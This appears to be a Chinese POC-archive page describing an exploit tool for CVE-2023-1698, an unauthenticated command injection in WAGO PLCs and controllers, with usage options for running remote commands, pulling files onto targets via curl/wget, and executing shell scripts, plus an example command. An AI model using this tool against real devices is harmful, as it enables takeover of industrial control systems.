关联漏洞
标题:
多款WAGO产品操作系统命令注入漏洞
(CVE-2023-1698)
描述:WAGO PFC100等都是德国万可(WAGO)公司的产品。WAGO PFC100是一款可编程逻辑控制器(PLC)。WAGO Compact Controller CC100是一个紧凑型控制器。WAGO Edge Controller是一个边缘控制器。 WAGO Compact Controller CC100、Edge Controller、PFC100、PFC200、Touch Panel 600 Advanced Line、Touch Panel 600 Marine Line、Touch Pane
描述
WAGO系统远程代码执行漏洞(CVE-2023-1698)
介绍
# WAGO-CVE-2023-1698
WAGO系统远程代码执行漏洞(CVE-2023-1698)
## Attention
I have developed a tool for local testing and POC development, which is for technical learning reference only. Please do not use it for illegal purposes. Any direct or indirect consequences and losses caused by individuals or organizations using the information provided in this article are the responsibility of the user themselves and have nothing to do with the author!!!
## Description
WAGO is a company specializing in electrical interconnection, automation, and interface electronic technology. In multiple products of WAGO, a vulnerability allows unauthenticated remote attackers to create new users and change device configurations, which may lead to remote RCE, denial of service, and damage to the entire system.
## installation
> pip install -r requirements.txt
## Tools Usage
```python
python "WAGO-CVE-2023-1698 .py" -h
usage: WAGO-CVE-2023-1698 .py [-h] (-u URL | -f FILE)
[--remote-file-include REMOTE_FILE_INCLUDE | --local-file-include LOCAL_FILE_INCLUDE | --remote-command REMOTE_COMMAND]
[--random-agent RANDOM_AGENT] [-d DELAY] [-t THREAD] [--proxy PROXY] [--type TYPE] [-o OUTPUT]
WAGO System Remote Code Execution Vulnerability (CVE-2023-1698)
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Enter target object
-f FILE, --file FILE Input target object file
--remote-file-include REMOTE_FILE_INCLUDE
Enter the filepath(it must be On the public network)
--local-file-include LOCAL_FILE_INCLUDE
Enter the filepath(it must be On the local)
--remote-command REMOTE_COMMAND
Enter the command you want to execute
--random-agent RANDOM_AGENT
Using random user agents
-d DELAY, --delay DELAY
Set multi threaded access latency (setting range from 0 to 5)
-t THREAD, --thread THREAD
Set the number of program threads (setting range from 1 to 50)
--proxy PROXY Set up the proxy
--type TYPE Set up the remote upload file type
-o OUTPUT, --output OUTPUT
output filename
```
## Params
>--remote-file-include,指定远程文件URL,会通过curl或者wget将文件上传到tmp目录或者当前目录, Specify a remote file URL, which will upload the file to the tmp directory or current directory through curl or wget
> --local-file-include,解析本地的shell脚本文件并在远端执行,Parse local shell script files and execute them remotely
>--remote-command REMOTE 执行一条系统命令,Execute a system command
## Example
>python wago.py -u ** --proxy http://127.0.0.1:10809 --remote-command "cat /var/log/wago"
文件快照
[4.0K] /data/pocs/9ec75b81910528df791d10f50b39ade52ec5400f
├── [1.0K] LICENSE
├── [2.9K] README.md
├── [ 18] requirements.txt
├── [3.2K] user_agent.py
└── [ 11K] WAGO-CVE-2023-1698 .py
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。